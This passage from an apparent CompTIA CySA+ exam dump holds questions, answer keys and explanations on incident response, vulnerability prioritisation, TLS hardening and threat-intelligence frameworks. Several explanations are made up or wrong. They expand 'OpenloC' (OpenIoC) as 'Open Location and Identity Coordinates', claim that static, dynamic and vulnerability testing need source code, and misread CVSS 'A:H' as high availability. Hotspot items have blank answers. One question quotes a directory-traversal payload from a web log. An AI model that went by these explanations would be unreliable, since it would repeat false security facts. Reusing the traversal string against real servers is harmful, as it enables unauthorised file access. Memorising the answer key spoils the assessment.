or interacting with the target. Foot printing is a term that refers to the process of gathering information
about a target network or system, such as its IP addresses, open ports, operating systems, services, or
vulnerabilities. Foot printing can be done for legitimate purposes, such as penetration testing or auditing, or
for malicious purposes, such as reconnaissance or intelligence gathering. Foot printing can be classified
into two types: active and passive. Active foot printing involves sending packets or requests to the target
and analyzing the responses, such as using tools like ping, traceroute, or Nmap. Active foot printing can
provide more accurate and detailed information, but it can also be detected by firewalls or intrusion
detection systems (IDS).
Passive foot printing involves observing or capturing network traffic without sending any packets or
requests to the target, such as using tools like tcpdump, Wireshark, or Shodan. Passive foot printing can
provide less information, but it can also avoid detection by firewalls or IDS. The example in the question
shows that the attacker has gained access to the syslog server on a LAN and reviewed the syslog entries
to prioritize possible next targets. A syslog server is a server that collects and stores log messages from
various devices or applications on a network. A syslog entry is a record of an event or activity that occurred
on a device or application, such as an error, a warning, or an alert. By reviewing the syslog entries, the
attacker can obtain information about the network or system, such as its configuration, status,
performance, or security issues. This is an example of passive network foot printing, as the attacker is not
sending any packets or requests to the target, but rather observing or capturing network traffic from the
syslog server. The other options are not correct, as they describe different techniques or concepts. OS
fingerprinting is a technique of identifying the operating system of a target by analyzing its responses to
certain packets or requests, such as using tools like Nmap or Xprobe2. OS fingerprinting can be done
actively or passively, but it is not what the attacker is doing in the example. Service port identification is a
technique of identifying the services running on a target by scanning its open ports and analyzing its
responses to certain packets or requests, such as using tools like Nmap or Netcat. Service port
identification can be done actively or passively, but it is not what the attacker is doing in the example.
Application versioning is a concept that refers to the process of assigning unique identifiers to different
versions of an application, such as using numbers, letters, dates, or names.
Application versioning can help to track changes, updates, bugs, or features of an application, but it is not
related to what the attacker is doing in the example.

QUESTION 97
After a security assessment was done by a third-party consulting firm, the cybersecurity program
recommended integrating DLP and CASB to reduce analyst alert fatigue.

Which of the following is the best possible outcome that this effort hopes to achieve?

A. SIEM ingestion logs are reduced by 20%.

B. Phishing alerts drop by 20%.
C. False positive rates drop to 20%.
D. The MTTR decreases by 20%.

Correct Answer: D
Explanation
Explanation/Reference:
The MTTR (Mean Time to Resolution) decreases by 20% is the best possible outcome that this effort
hopes to achieve, as it reflects the improvement in the efficiency and effectiveness of the incident response
process by reducing analyst alert fatigue. Analyst alert fatigue is a term that refers to the phenomenon of
security analysts becoming overwhelmed, desensitized, or exhausted by the large number of alerts they
receive from various security tools or systems, such as DLP (Data Loss Prevention) or CASB (Cloud
Access Security Broker). DLP is a security solution that helps to prevent unauthorized access, use, or
transfer of sensitive data, such as personal information, intellectual property, or financial records. CASB is
a security solution that helps to monitor and control the use of cloud-based applications and services, such
as SaaS (Software as a Service), PaaS (Platform as a Service), or IaaS (Infrastructure as a Service). Both
DLP and CASB can generate alerts when they detect potential data breaches, policy violations, or
malicious activities, but they can also produce false positives, irrelevant information, or duplicate
notifications that can overwhelm or distract the security analysts. Analyst alert fatigue can have negative
consequences for the security posture and performance of an organization, such as missing or ignoring
critical alerts, delaying or skipping investigations or remediations, making errors or mistakes, or losing
motivation or morale. Therefore, it is important to reduce analyst alert fatigue and optimize the alert
management process by using various strategies, such as tuning the alert thresholds and rules, prioritizing
and triaging the alerts based on severity and context, enriching and correlating the alerts with additional
data sources, automating or orchestrating repetitive or low-level tasks or actions, or integrating and
consolidating different security tools or systems into a unified platform. By reducing analyst alert fatigue
and optimizing the alert management process, the effort hopes to achieve a decrease in the MTTR, which
is a metric that measures the average time it takes to resolve an incident from the moment it is reported to
the moment it is closed. A lower MTTR indicates a faster and more effective incident response process,
which can help to minimize the impact and damage of security incidents, improve customer satisfaction
and trust, and enhance security operations and outcomes. The other options are not as relevant or realistic
as the MTTR decreases by 20%, as they do not reflect the best possible outcome that this effort hopes to
achieve. SIEM ingestion logs are reduced by 20% is not a relevant outcome, as it does not indicate any
improvement in the incident response process or any reduction in analyst alert fatigue. SIEM (Security
Information and Event Management) is a security solution that collects and analyzes data from various
sources, such as logs, events, or alerts, and provides security monitoring, threat detection, and incident
response capabilities. SIEM ingestion logs are records of the data that is ingested by the SIEM system
from different sources. Reducing SIEM ingestion logs may imply less data volume or less data sources for
the SIEM system, which may not necessarily improve its performance or accuracy. Phishing alerts drop by
20% is not a realistic outcome, as it does not depend on the integration of DLP and CASB or any reduction
in analyst alert fatigue. Phishing alerts are notifications that indicate potential phishing attempts or attacks,
such as fraudulent emails, websites, or messages that try to trick users into revealing sensitive information
or installing malware. Phishing alerts can be generated by various security tools or systems, such as email
security solutions, web security solutions, endpoint security solutions, or user
awareness training programs. Reducing phishing alerts may imply less phishing attempts or attacks on the
organization, which may not necessarily be influenced by the integration of DLP and CASB or any
reduction in analyst alert fatigue. False positive rates drop to 20% is not a realistic outcome

QUESTION 98
Which of the following is a reason why proper handling and reporting of existing evidence are important for
the investigation and reporting phases of an incident response?

A. To ensure the report is legally acceptable in case it needs to be presented in court

B. To present a lessons-learned analysis for the incident response team
C. To ensure the evidence can be used in a postmortem analysis
D. To prevent the possible loss of a data source for further root cause analysis

Correct Answer: A
Explanation

Explanation/Reference:
To ensure the report is legally acceptable in case it needs to be presented in court. Proper handling and
reporting of existing evidence are important for the investigation and reporting phases of an incident
response because they ensure the integrity, authenticity, and admissibility of the evidence in case it needs
to be presented in court. Evidence that is mishandled, tampered with, or poorly documented may not be
accepted by the court or may be challenged by the opposing party. Therefore, incident responders should
follow the best practices and standards for evidence collection, preservation, analysis, and reporting.
The other options are not reasons why proper handling and reporting of existing evidence are important for
the investigation and reporting phases of an incident response. They are rather outcomes or benefits of
conducting a thorough and effective incident response process. A lessons-learned analysis (B) is a way to
identify the strengths and weaknesses of the incident response team and improve their performance for
future incidents. A postmortem analysis © is a way to determine the root cause, impact, and timeline of the
incident and provide recommendations for remediation and prevention. A root cause analysis (D) is a way
to identify the underlying factors that led to the incident and address them accordingly.

QUESTION 99
Which of the following is often used to keep the number of alerts to a manageable level when establishing
a process to track and analyze violations?

A. Log retention
B. Log rotation
C. Maximum log size
D. Threshold value

Correct Answer: D
Explanation

Explanation/Reference:
A threshold value is a parameter that defines the minimum or maximum level of a metric or event that
triggers an alert. For example, a threshold value can be set to alert when the number of failed login
attempts exceeds 10 in an hour, or when the CPU usage drops below 20% for more than 15 minutes. By
setting a threshold value, the process can filter out irrelevant or insignificant alerts and focus on the ones
that indicate a potential problem or anomaly. A threshold value can help to reduce the noise and false
positives in the alert system, and improve the efficiency and accuracy of the analysis

QUESTION 100
A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating
systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication.

Which of the following does this most likely describe?

A. System hardening
B. Hybrid network architecture
C. Continuous authorization
D. Secure access service edge

Correct Answer: A
Explanation

Explanation/Reference:
System hardening is the process of securing a system by reducing its attack surface, applying patches and
updates, configuring security settings, and implementing security controls. System hardening can help
prevent or mitigate vulnerability events that may affect operating systems. Host-based IPS, firewalls, and
two-factor authentication are examples of security controls that can be applied to harden a system. The
other options are not the best descriptions of the scenario. A hybrid network architecture (B) is a network
design that combines on-premises and cloud-based resources, which may or may not involve system
hardening. Continuous authorization © is a security approach that monitors and validates the security
posture of a system on an ongoing basis, which is different from system hardening. Secure access service
edge (D) is a network architecture that delivers cloud-based security services to remote users and devices,
which is also different from system hardening.

QUESTION 101
Which of the following is a commonly used four-component framework to communicate threat actor
behavior?

A. STRIDE
B. Diamond Model of Intrusion Analysis
C. Cyber Kill Chain
D. MITRE ATT&CK

Correct Answer: B
Explanation

Explanation/Reference:
The Diamond Model of Intrusion Analysis is a framework that describes the relationship between four
components of a cyberattack: adversary, capability, infrastructure, and victim. It helps analysts understand
the behavior and motivation of threat actors, as well as the tools and methods they use to compromise
their targets12.

References: Main Analytical Frameworks for Cyber Threat Intelligence, section 4;

Strategies, tools, and frameworks for building an effective threat intelligence team, section 3.

QUESTION 102
A company has decided to expose several systems to the internet, The systems are currently available
internally only. A security analyst is using a subset of CVSS3.1 exploitability metrics to prioritize the
vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The
systems and the vulnerabilities are shown below:

Which of the following systems should be prioritized for patching?

A. brown
B. grey
C. blane
D. sullivan

Correct Answer: C
Explanation

Explanation/Reference:
The system “blane” with the vulnerability name “snakedoctor” should be prioritized for patching as it has a
network attack vector (AV:N), low attack complexity (AC:L), and high availability (A:H). These metrics
indicate that it would be relatively easy to exploit this vulnerability over the internet, and the system is
highly available. References: According to the CVSS v3.1 Specification Document, the exploitability
metrics for CVSS are Attack Vector, Attack Complexity, Privileges Required, User Interaction, and Scope.
These metrics measure how the vulnerability is accessed, the complexity of the attack, and the level of
interaction and privileges required to exploit the vulnerability. The image shows a table with the values of
these metrics for each system and vulnerability. Based on these values, the system “blane” has the highest
exploitability score, as it has the most favorable conditions for an attacker. The other systems have either a
lower attack vector, higher attack complexity, or lower availability, which make them less exploitable.
Therefore, the system “blane” should be patched first.
Exam D

QUESTION 1
HOTSPOT

The developers recently deployed new code to three web servers. A daily automated external device scan
report shows server vulnerabilities that are failing items according to PCI DSS.

If the vulnerability is not valid, the analyst must take the proper steps to get the scan clean.

If the vulnerability is valid, the analyst must remediate the finding.

After reviewing the information provided in the network diagram, select the STEP 2 tab to complete the
simulation by selecting the correct Validation Result and Remediation Action for each server listed using
the drop-down options.

INSTRUCTIONS

STEP 1: Review the information provided in the network diagram.

STEP 2: Given the scenario, determine which remediation action is required to address the vulnerability.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.

Step 1
Hot Area:
Correct Answer:
Explanation

Explanation/Reference:

QUESTION 2
HOTSPOT

A security analyst performs various types of vulnerability scans.

Review the vulnerability scan results to determine the type of scan that was executed and if a false positive
occurred for each device.

INSTRUCTIONS

Select the Results Generated drop-down option to determine if the results were generated from a
credentialed scan, non-credentialed scan, or a compliance scan.

For ONLY the credentialed and non-credentialed scans, evaluate the results for False Positives and check
the Findings that display false positives.

NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.
Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server to the
results. The Linux Web Server, File-Print Server, and Directory Server are draggable.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
Hot Area:
Correct Answer:
QUESTION 3
HOTSPOT

A company recently experienced a security incident. The security team has determined a user clicked on a
link embedded in a phishing email that was sent to the entire company. The link resulted in a malware
download, which was subsequently installed and run.

INSTRUCTIONS

Part 1

Review the artifacts associated with the security incident. Identify the name of the malware, the malicious
IP address, and the date and time when the malware executable entered the organization.

Part 2
Review the kill chain items and select an appropriate control for each that would improve the security
posture of the organization and would have helped to prevent this incident from occurring. Each control
may only be used once, and not all controls will be used.

Firewall log:
File integrity Monitoring Report:
Malware domain list:
Vulnerability Scan Report:
Phishing Email:
Hot Area:
Correct Answer:
Explanation

Explanation/Reference:
Exam E

QUESTION 1
Which of the following makes STIX and OpenloC information readable by both humans and machines?

A. XML
B. URL
C. OVAL
D. TAXII

Correct Answer: A
Explanation

Explanation/Reference:
The correct answer is A. XML.

STIX and OpenloC are two standards for representing and exchanging cyber threat intelligence (CTI)
information. STIX stands for Structured Threat Information Expression and OpenloC stands for Open
Location and Identity Coordinates. Both standards use XML as the underlying data format to encode the
information in a structured and machine- readable way. XML stands for Extensible Markup Language and
it is a widely used standard for defining and exchanging data on the web. XML uses tags, attributes, and
elements to describe the structure and meaning of the data. XML is also human-readable, as it uses plain
text and follows a hierarchical and nested structure. XML is not the only format that can be used to make
STIX and OpenloC information readable by both humans and machines, but it is the most common and
widely supported one. Other formats that can be used include JSON, CSV, or PDF, depending on the use
case and the preferences of the information producers and consumers. However, XML has some
advantages over other formats, such as:
XML is more expressive and flexible than JSON or CSV, as it can define complex data types, schemas,
namespaces, and validation rules. XML is more standardized and interoperable than PDF, as it can be
easily parsed, transformed, validated, and queried by various tools and languages. XML is more
compatible with existing CTI standards and tools than other formats, as it is the basis for STIX 1.x, TAXII
1.x, MAEC, CybOX, OVAL, and others.
References:
1 Introduction to STIX - GitHub Pages
2 5 Best Threat Intelligence Feeds in 2023 (Free & Paid Tools) - Comparitech 3 What Are STIX/TAXII
Standards? - Anomali Resources 4 What is STIX/TAXII? | Cloudflare 5 Sample Use | TAXII Project
Documentation - GitHub Pages 6 Trying to retrieve xml data with taxii - Stack Overflow 7 CISA AIS TAXII
Server Connection Guide 8 CISA AIS TAXII Server Connection Guide v2.0 | CISA

QUESTION 2
Which of the following describes a contract that is used to define the various levels of maintenance to be
provided by an external business vendor in a secure environment?

A. MOU
B. NDA
C. BIA
D. SLA

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: SLA stands for Service Level Agreement, which is a contract that defines the various levels of
maintenance to be provided by an external business vendor in a secure environment. An SLA specifies the
expectations, responsibilities, and obligations of both parties, such as the scope, quality, availability, and
performance of the service, as well as the metrics and methods for measuring and reporting the service
level. An SLA also outlines the penalties or remedies for any breach or failure of the service level. An SLA
can help ensure that the external business vendor delivers the service in a timely, consistent, and secure
manner, and that the customer receives the service that meets their needs and requirements. Official
References:
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002- exam-objectives
https://www.comptia.org/certifications/cybersecurity-analyst https://www.comptia.org/blog/the-new-
comptia-cybersecurity-analyst-your- questions-answered

QUESTION 3
Which of the following can be used to learn more about TTPs used by cybercriminals?

A. ZenMAP
B. MITRE ATT&CK
C. National Institute of Standards and Technology
D. theHarvester

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques
based on real-world observations. It is used as a foundation for the development of specific threat models
and methodologies in the private sector, in government, and in the cybersecurity product and service
community. It can help security professionals understand, detect, and mitigate cyber threats by providing a
comprehensive framework of TTPs.
References: MITRE ATT&CK, Getting Started with ATT&CK, MITRE ATT&CK | MITRE

QUESTION 4
While reviewing the web server logs a security analyst notices the following snippet ..\../..\../boot.ini

Which of the following is being attempted?

A. Directory traversal
B. Remote file inclusion
C. Cross-site scripting
D. Remote code execution
E. Enumeration of/etc/pasawd

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The log entry "......\boot.ini" is indicative of a directory traversal attack, where an attacker
attempts to access files and directories that are stored outside the web root folder.

The log snippet "......\boot.ini" is indicative of a directory traversal attack. This type of attack aims to access
files and directories that are stored outside the web root folder. By manipulating variables that reference
files with "../" (dot-dot-slash), the attacker may be able to access arbitrary files and directories stored on
the file system.

QUESTION 5
While a security analyst for an organization was reviewing logs from web servers. the analyst found
several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible
to padding oracle attacks. Which of the following combinations of configuration changes should the
organization make to remediate this issue? (Select two).

A. Configure the server to prefer TLS 1.3.

B. Remove cipher suites that use CBC.
C. Configure the server to prefer ephemeral modes for key exchange.
D. Require client browsers to present a user certificate for mutual authentication.
E. Configure the server to require HSTS.
F. Remove cipher suites that use GCM.

Correct Answer: AB
Explanation

Explanation/Reference:
The correct answer is A. Configure the server to prefer TLS 1.3 and B. Remove cipher suites that use
CBC.

A padding oracle attack is a type of attack that exploits the padding validation of a cryptographic message
to decrypt the ciphertext without knowing the key. A padding oracle is a system that responds to queries
about whether a message has a valid padding or not, such as a web server that returns different error
messages for invalid padding or invalid MAC. A padding oracle attack can be applied to the CBC mode of
operation, where the attacker can manipulate the ciphertext blocks and use the oracle's responses to
recover the plaintext12.
To remediate this issue, the organization should make the following configuration changes:
Configure the server to prefer TLS 1.3. TLS 1.3 is the latest version of the Transport Layer Security
protocol, which provides secure communication between clients and servers. TLS 1.3 has several security
improvements over previous versions, such as:
Remove cipher suites that use CBC. Cipher suites are combinations of cryptographic algorithms that
specify how TLS connections are secured. Cipher suites that use CBC mode are vulnerable to padding
oracle attacks, as well as other attacks such as BEAST and Lucky 13. Therefore, they should be removed
from the server's configuration and replaced with cipher suites that use more secure modes of operation,
such as GCM or CCM78. The other options are not effective or necessary to remediate this issue. Option
C is not effective because configuring the server to prefer ephemeral modes for key exchange does not
prevent padding oracle attacks. Ephemeral modes for key exchange are methods that generate temporary
and random keys for each session, such as Diffie- Hellman or Elliptic Curve Diffie-Hellman. Ephemeral
modes provide forward secrecy, which means that compromising the long-term keys does not affect the
security of past sessions. However, ephemeral modes do not protect against padding oracle attacks, which
exploit the padding validation of the ciphertext rather than the key exchange9. Option D is not necessary
because requiring client browsers to present a user certificate for mutual authentication does not prevent
padding oracle attacks. Mutual authentication is a process that verifies the identity of both parties in a
communication, such as using certificates or passwords. Mutual authentication enhances security by
preventing impersonation or spoofing attacks. However, mutual authentication does not protect against
padding oracle attacks, which exploit the padding validation of the ciphertext rather than the authentication.
Option E is not necessary because configuring the server to require HSTS does not prevent padding
oracle attacks. HSTS stands for HTTP Strict Transport Security and it is a mechanism that forces browsers
to use HTTPS connections instead of HTTP connections when communicating with a web server. HSTS
enhances security by preventing downgrade or man-in-the-middle attacks that try to intercept or modify
HTTP traffic. However, HSTS does not protect against padding oracle attacks, which exploit the padding
validation of HTTPS traffic rather than the protocol. Option F is not effective because removing cipher
suites that use GCM does not prevent padding oracle attacks. GCM stands for Galois/ Counter Mode and
it is a mode of operation that provides both encryption and authentication for block ciphers, such as AES.
GCM is more secure and efficient than CBC mode, as it prevents various types of attacks, such as padding
oracle, BEAST, Lucky 13, and IV reuse attacks. Therefore, removing cipher suites that use GCM would
reduce security rather than enhance it .
References:
1 Padding oracle attack - Wikipedia
2 flast101/padding-oracle-attack-explained - GitHub 3 A Cryptographic Analysis of the TLS 1.3 Handshake
Protocol | Journal of Cryptology 4 Which block cipher mode of operation does TLS 1.3 use? -
Cryptography Stack Exchange
5 The Essentials of Using an Ephemeral Key Under TLS 1.3 6 Guidelines for the Selection, Configuration,
and Use of ... - NIST 7 CBC decryption vulnerability - .NET | Microsoft Learn 8 The Padding Oracle Attack |
Robert Heaton 9 What is Ephemeral Diffie-Hellman? | Cloudflare
[10] What is Mutual TLS? How mTLS Authentication Works | Cloudflare [11] What is HSTS? HTTP Strict
Transport Security Explained | Cloudflare [12] Galois/Counter Mode - Wikipedia [13] AES-GCM and its IV/
nonce value - Cryptography Stack Exchange

QUESTION 6
A systems administrator notices unfamiliar directory names on a production server. The administrator
reviews the directory listings and files, and then concludes the server has been compromised. Which of the
following steps should the administrator take next?

A. Inform the internal incident response team.

B. Follow the company's incident response plan.
C. Review the lessons learned for the best approach.
D. Determine when the access started.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: An incident response plan is a set of predefined procedures and guidelines that an
organization follows when faced with a security breach or attack. An incident response plan helps to
ensure that the organization can quickly and effectively contain, analyze, eradicate, and recover from the
incident, as well as prevent or minimize the damage and impact to the business operations, reputation, and
customers. An incident response plan also defines the roles and responsibilities of the incident response
team, the communication channels and protocols, the escalation and reporting procedures, and the tools
and resources available for the incident response. By following the company's incident response plan, the
administrator can ensure that they are following the best practices and standards for handling a security
incident, and that they are coordinating and collaborating with the relevant stakeholders and authorities.
Following the company's incident response plan can also help to avoid or reduce any legal, regulatory, or
contractual liabilities or penalties that may arise from the incident. The other options are not as effective or
appropriate as following the company's incident response plan. Informing the internal incident response
team (A) is a good step, but it should be done according to the company's incident response plan, which
may specify who, when, how, and what to report. Reviewing the lessons learned for the best approach ?is
a good step, but it should be done after the incident has been resolved and closed, not during the active
response phase. Determining when the access started (D) is a good step, but it should be done as part of
the analysis phase of the incident response plan, not before following the plan.

QUESTION 7
A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the
following should the analyst perform next?

A. Eradication
B. Isolation
C. Reporting
D. Forensic analysis

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: After recovering a compromised server to its previous state, the analyst should perform
forensic analysis to determine the root cause, impact, and scope of the incident, as well as to identify any
indicators of compromise, evidence, or artifacts that can be used for further investigation or prosecution.
References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 6, page 244; CompTIA
CySA+ CS0-003 Certification Study Guide, Chapter 6, page 253.

QUESTION 8
A company has a primary control in place to restrict access to a sensitive database. However, the
company discovered an authentication vulnerability that could bypass this control. Which of the following is
the best compensating control?

A. Running regular penetration tests to identify and address new vulnerabilities

B. Conducting regular security awareness training of employees to prevent social engineering attacks
C. Deploying an additional layer of access controls to verify authorized individuals
D. Implementing intrusion detection software to alert security teams of unauthorized access attempts

Correct Answer: C
Explanation

Explanation/Reference:
Deploying an additional layer of access controls to verify authorized individuals is the best compensating
control for the authentication vulnerability that could bypass the primary control. A compensating control is
a security measure that is implemented to mitigate the risk of a vulnerability or a threat when the primary
control is not sufficient or feasible. A compensating control should provide a similar or greater level of
protection as the primary control, and should be closely related to the vulnerability or the threat it is
addressing1. In this case, the primary control is to restrict access to a sensitive database, and the
vulnerability is an authentication bypass. Therefore, the best compensating control is to deploy an
additional layer of access controls, such as multifactor authentication, role-based access control, or
encryption, to verify the identity and the authorization of the individuals who are accessing the database.
This way, the compensating control can prevent unauthorized access to the database, even if the primary
control is bypassed23. Running regular penetration tests, conducting regular security awareness training,
and implementing intrusion detection software are all good security practices, but they are not
compensating controls for the authentication vulnerability, as they do not provide a similar or greater level
of protection as the primary control, and they are not closely related to the vulnerability or the threat they
are addressing. References: Compensating Controls: An Impermanent Solution to an IT ... - Tripwire, What
is Multifactor Authentication (MFA)? | Duo Security, Role-Based Access Control (RBAC) and Role-Based
Security, [What is a Penetration Test and How Does It Work?]

QUESTION 9
Which of the following best describes the goal of a disaster recovery exercise as preparation for possible
incidents?

A. TO provide metrics and test continuity controls

B. To verify the roles of the incident response team
C. To provide recommendations for handling vulnerabilities
D. To perform tests against implemented security controls

Correct Answer: A
Explanation

Explanation/Reference:
The correct answer is A. To provide metrics and test continuity controls.

A disaster recovery exercise is a simulation or a test of the disaster recovery plan, which is a set of
procedures and resources that are used to restore the normal operations of an organization after a
disaster or a major incident. The goal of a disaster recovery exercise is to provide metrics and test
continuity controls, which are the measures that ensure the availability and resilience of the critical systems
and processes of an organization. A disaster recovery exercise can help evaluate the effectiveness,
efficiency, and readiness of the disaster recovery plan, as well as identify and address any gaps or issues .
The other options are not the best descriptions of the goal of a disaster recovery exercise. Verifying the
roles of the incident response team (B) is a goal of an incident response exercise, which is a simulation or
a test of the incident response plan, which is a set of procedures and roles that are used to detect, contain,
analyze, and remediate an incident. Providing recommendations for handling vulnerabilities ?is a goal of a
vulnerability assessment, which is a process of identifying and prioritizing the weaknesses and risks in an
organization's systems or network. Performing tests against implemented security controls (D) is a goal of
a penetration test, which is an authorized and simulated attack on an organization's systems or network to
evaluate their security posture and identify any vulnerabilities or misconfigurations.

QUESTION 10
A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment.
In collecting scheduled tasks from all enterprise workstations, the following host details are aggregated:
Which of the following actions should the hunter perform first based on the details above?

A. Acquire a copy of taskhw.exe from the impacted host

B. Scan the enterprise to identify other systems with taskhw.exe present
C. Perform a public search for malware reports on taskhw.exe.
D. Change the account that runs the -caskhw. exe scheduled task

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The first step should be to perform a public search for malware reports on taskhw.exe, as this
file is suspicious for several reasons: it is located in a non-standard path, it has a high CPU usage, it is
signed by an unknown entity, and it is only present on one host. A public search can help to determine if
this file is a known malware or a legitimate program. If it is malware, the hunter can then take appropriate
actions to remove it and prevent further damage. The other options are either premature or ineffective, as
they do not provide enough information to assess the threat level of taskhw.exe. References:
Cybersecurity Analyst+ - CompTIA, taskhw.exe Windows process
- What is it? - file.net, Taskhostw.exe - What Is Taskhostw.exe & Is It Malware? - MalwareTips Forums

QUESTION 11
A security analyst observed the following activity from a privileged account:

Accessing emails and sensitive information

Audit logs being modified
Abnormal log-in times

Which of the following best describes the observed activity?

A. Irregular peer-to-peer communication

B. Unauthorized privileges
C. Rogue devices on the network
D. Insider attack

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: The observed activity from a privileged account indicates an insider attack, which is when a
trusted user or employee misuses their access rights to compromise the security of the organization.
Accessing emails and sensitive information, modifying audit logs, and logging in at abnormal times are all
signs of malicious behavior by a privileged user who may be trying to steal, tamper, or destroy data, or
cover their tracks. An insider attack can cause significant damage to the organization's reputation,
operations, and compliance12. References: The Privileged Identity Playbook Guides Management of
Privileged User Accounts, How to Track Privileged Users' Activities in Active Directory

QUESTION 12
An organization is conducting a pilot deployment of an e-commerce application. The application's source
code is not available. Which of the following strategies should an analyst recommend to evaluate the
security of the software?

A. Static testing
B. Vulnerability testing
C. Dynamic testing
D. Penetration testing

Correct Answer: D
Explanation
Explanation/Reference:
Explanation: Penetration testing is the best strategy to evaluate the security of the software without the
source code. Penetration testing is a type of security testing that simulates real-world attacks on the
software to identify and exploit its vulnerabilities. Penetration testing can be performed on the software as
a black box, meaning that the tester does not need to have access to the source code or the internal
structure of the software. Penetration testing can help the analyst to assess the security posture of the
software, the potential impact of the vulnerabilities, and the effectiveness of the existing security
controls12. Static testing, vulnerability testing, and dynamic testing are other types of security testing, but
they usually require access to the source code or the internal structure of the software. Static testing is the
analysis of the software code or design without executing it. Vulnerability testing is the identification and
evaluation of the software weaknesses or flaws. Dynamic testing is the analysis of the software code or
design while executing it345. References: Penetration Testing - OWASP, What is a Penetration Test and
How Does It Work?, Static Code Analysis | OWASP Foundation, Vulnerability Scanning Best Practices,
Dynamic Testing - OWASP

QUESTION 13
A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web
application. The analyst is concerned about the following output:

[+] XSS: In form input 'txtSearch' with action https://localhost/search.aspx

[-] XSS: Analyzing response #1...

[-] XSS: Analyzing response #2...

[-] XSS: Analyzing response #3...

[+] XSS: Response is tainted. Looking for proof of the vulnerability.

Which of the following is the most likely reason for this vulnerability?

A. The developer set input validation protection on the specific field of search.aspx.
B. The developer did not set proper cross-site scripting protections in the header.
C. The developer did not implement default protections in the web application build.
D. The developer did not set proper cross-site request forgery protections.

Correct Answer: B
Explanation

Explanation/Reference:
The most likely reason for this vulnerability is B. The developer did not set proper cross-site scripting
protections in the header. Cross-site scripting (XSS) is a type of web application vulnerability that allows an
attacker to inject malicious code into a web page that is viewed by other users. XSS can be used to steal
cookies, session tokens, credentials, or other sensitive information, or to perform actions on behalf of the
victim1. One of the common ways to prevent XSS attacks is to set proper HTTP response headers that
instruct the browser how to handle the content of the web page. For example, the Content-Type header
can specify the MIME type and character encoding of the web page, which can help the browser avoid
interpreting data as code. The X-XSS-Protection header can enable or disable the browser's built-in XSS
filter, which can block or sanitize suspicious scripts. The Content-Security-Policy header can define a
whitelist of sources and directives that control what resources and scripts can be loaded or executed on
the web page2.
According to the output of Arachni, a web application security scanner framework3, it detected an XSS
vulnerability in the form input `txtSearch' with action https://localhost/search.aspx. This means that Arachni
was able to inject a malicious script into the input field and observe its execution in the response. This
indicates that the developer did not set proper cross-site scripting protections in the header of search.aspx,
which allowed Arachni to bypass the browser's default security mechanisms and execute arbitrary code on
the web page.

QUESTION 14
An organization discovered a data breach that resulted in Pll being released to the public. During the
lessons learned review, the panel identified discrepancies regarding who was responsible for external
reporting, as well as the timing requirements. Which of the following actions would best address the
reporting issue?
A. Creating a playbook denoting specific SLAs and containment actions per incident type
B. Researching federal laws, regulatory compliance requirements, and organizational policies to
document specific reporting SLAs
C. Defining which security incidents require external notifications and incident reporting in addition to
internal stakeholders
D. Designating specific roles and responsibilities within the security team and stakeholders to streamline
tasks

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Researching federal laws, regulatory compliance requirements, and organizational policies to
document specific reporting SLAs is the best action to address the reporting issue. Reporting SLAs are
service level agreements that specify the time frame and the format for notifying the relevant authorities
and the affected individuals of a data breach. Reporting SLAs may vary depending on the type and
severity of the breach, the type and location of the data, the industry and jurisdiction of the organization,
and the internal policies of the organization. By researching and documenting the reporting SLAs for
different scenarios, the organization can ensure that it complies with the legal and ethical obligations of
data breach notification, and avoid any penalties, fines, or lawsuits that may result from failing to report a
breach in a timely and appropriate manner12. References: When and how to report a breach: Data breach
reporting best practices, Incident and Breach Management

QUESTION 15
When undertaking a cloud migration of multiple SaaS application, an organizations system administrator
struggled ... identity and access management to cloud-based assets. Which of the following service
models would have reduced the complexity of this project?

A. CASB
B. SASE
C. ZTNA
D. SWG

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: A Cloud Access Security Broker (CASB) would have reduced the complexity of identity and
access management in cloud-based assets. CASBs provide visibility into cloud application usage, data
protection, and governance for cloud-based services.

QUESTION 16
Two employees in the finance department installed a freeware application that contained embedded
malware. The network is robustly segmented based on areas of responsibility. These computers had
critical sensitive information stored locally that needs to be recovered. The department manager advised
all department employees to turn off their computers until the security team could be contacted about the
issue. Which of the following is the first step the incident response staff members should take when they
arrive?

A. Turn on all systems, scan for infection, and back up data to a USB storage device.
B. Identify and remove the software installed on the impacted systems in the department.
C. Explain that malware cannot truly be removed and then reimage the devices.
D. Log on to the impacted systems with an administrator account that has privileges to perform backups.
E. Segment the entire department from the network and review each computer offline.

Correct Answer: E
Explanation

Explanation/Reference:
Segmenting the entire department from the network and reviewing each computer offline is the first step
the incident response staff members should take when they arrive. This step can help contain the malware
infection and prevent it from spreading to other systems or networks. Reviewing each computer offline can
help identify the source and scope of the infection, and determine the best course of action for recovery12.
Turning on all systems, scanning for infection, and backing up data to a USB storage device is a risky step,
as it can activate the malware and cause further damage or data loss. It can also compromise the USB
storage device and any other system that connects to it. Identifying and removing the software installed on
the impacted systems in the department is a possible step, but it should be done after segmenting the
department from the network and reviewing each computer offline. Explaining that malware cannot truly be
removed and then reimaging the devices is a drastic step, as it can result in data loss and downtime. It
should be done only as a last resort, and after backing up the data and verifying its integrity. Logging on to
the impacted systems with an administrator account that has privileges to perform backups is a dangerous
step, as it can expose the administrator credentials and privileges to the malware, and allow it to escalate
its access and capabilities34. References: Incident Response: Processes, Best Practices & Tools -
Atlassian, Incident Response Best Practices | SANS Institute, Malware Removal: How to Remove Malware
